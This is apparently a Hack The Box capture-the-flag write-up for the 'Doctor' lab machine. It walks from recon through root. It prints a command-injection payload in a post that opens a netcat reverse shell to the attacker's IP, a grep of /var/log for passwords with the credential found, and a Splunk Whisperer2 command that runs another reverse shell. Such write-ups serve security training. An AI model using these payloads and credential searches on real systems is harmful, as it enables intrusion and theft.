Hack The Box is an online platform to test and advance your skills in penetration testing and cyber security.
Reconnaissance
Service enumeration with Nmap (TCP scan on all ports with version detection and scripts):
A domain name “doctors.htb” was found on the web application hosted on the “http://10.10.10.209” address:
No web server was accessible on “http://doctors.htb” so the file “/etc/hosts” had to be edited to resolve the domain to the “10.10.10.209” IP address:
10.10.10.209 doctors.htb
The application allowed the users to create new posts which were visible on the main page.
Inspecting the HTML source code, led to the “http://doctors.htb/archive” page which reveled an XML output. The title of the previously created post was visible without sanitization inside the “<title>” elements. It was suspected that the application is vulnerable against Server Side Template
Injection. The attacker might be able to insert malicious payload into the template which is executed on server-side.
Exploitation
After several attempts, it was determined that the server was hosting a binary of Netcat Traditional.
Launching Netcat reverse shell on the targeted host:
nc.traditional -e /bin/sh [IPADDR] [PORT]
Opening a Netcat listener on the attacker’s host:
nc -nlvp [PORT]
After the adequate template engine was determined (Server Side Template Injection attacks), the following payload had to be injected as the content of a new post:
<img src=http://10.10.14.84/$(nc.traditional$IFS-e$IFS/bin/sh$IFS'10.10.14.84'$IFS'4444')>
After the reverse shell was created, an interactive Python-shell could be established on behalf of the “web@doctor” user:
python3 -c 'import pty;pty.spawn("/bin/bash")'
After user enumeration, the current user was a member of the “adm” group which is responsible for monitoring tasks. It turned out that the log files were accessible for this user. A quick search against sensitive information revealed a password in a log file:
grep -R -e 'password' /var/log/
Identified password: Guitar123
Identified user: shaun
Switching to user “shaun” by using the discovered password “Guitar123”:
su shaun
Privilege Escalation
The target was running a vulnerable version of Splunk Forwarder Instance on port 8089. A quick search revealed an exploit Splunk Whisperer2 which could be used to obtain a root shell:
python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.84 --username shaun --password Guitar123 --payload "nc.traditional -e /bin/sh '10.10.14.84' '4443'"